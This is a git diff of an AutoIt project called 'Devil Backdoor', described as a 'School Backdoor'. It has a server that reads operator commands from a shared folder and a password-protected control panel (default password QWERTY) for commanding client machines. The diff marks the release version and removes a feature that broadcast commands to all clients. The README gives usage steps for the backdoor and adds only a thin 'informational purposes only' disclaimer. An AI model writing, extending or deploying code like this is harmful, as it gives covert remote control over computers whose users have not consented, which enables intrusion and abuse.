diff --git a/Devil-ControlPanel.au3 b/Devil-ControlPanel.au3 index b2b73eb..6875a41 100644 --- a/Devil-ControlPanel.au3 +++ b/Devil-ControlPanel.au3 @@ -2,7 +2,7 @@ Devil ControlPanel ( School Backdoor ) AutoIt Version: 3.3.14.2 - Version: Beta 3 ( 20:55 11.09.2017) + Version: Release ( 19:45 12.09.2017) #ce ---------------------------------------------------------------------------- @@ -106,8 +106,6 @@ While True LockGUI() DisableBlockTaskManager() UnLockGUI() - Case $Text - GUICtrlSetData($InputBox, "PublicData") EndSwitch WEnd diff --git a/Devil-Server.au3 b/Devil-Server.au3 index e9dfdff..a1b12b6 100644 --- a/Devil-Server.au3 +++ b/Devil-Server.au3 @@ -2,7 +2,7 @@ Devil Server ( School Backdoor ) AutoIt Version: 3.3.14.2 - Version: Beta 3 ( 20:55 11.09.2017) + Version: Release ( 19:45 12.09.2017) #ce ---------------------------------------------------------------------------- @@ -80,15 +80,6 @@ WEnd ; Get data from the shared folder Func ReadServer() - ; Read public data - If FileExists($Config_ServerPatch & "\PublicData") Then - Local $Data[2] - $Data[0] = IniRead($Config_ServerPatch & "\PublicData", "Data", "Type", "") - $Data[1] = IniRead($Config_ServerPatch & "\PublicData", "Data", "Command", "") - Sleep($Config_Speed * 5) - FileDelete($Config_ServerPatch & "\PublicData") - Return $Data - EndIf ; Read data from server If FileExists($Config_ServerPatch & "\" & $Config_ClientID) Then diff --git a/README.md b/README.md index 7aed43a..fc996db 100644 --- a/README.md +++ b/README.md @@ -34,7 +34,7 @@ Save the config file, and run **Devil-Server.exe** file! If you put **True** in Run **Devil-ControlPanel.exe** _( If you fill **ControlPanelPatch** option in config file, you can press Hotkey to run Control Panel. Default hotkey is **PAUSE** )_ and enter the password specified in the code. (Default is _QWERTY_) Run **Devil-ControlPanel.exe** and enter the password specified in the code. (Default is _QWERTY_) -Next, in the window that appears, select the shared folder. When the interface appears, in the inputbox type the _ClientID_ to select client, that will receive the command. (You can enter _PublicData_ or click on _ClientID_ text to send the command to all clients) +Next, in the window that appears, select the shared folder. When the interface appears, in the inputbox type the _ClientID_ to select client, that will receive the command. *** ###### Devil-Backdoor project is for informational purposes only! You take full responsibility for using this sofware!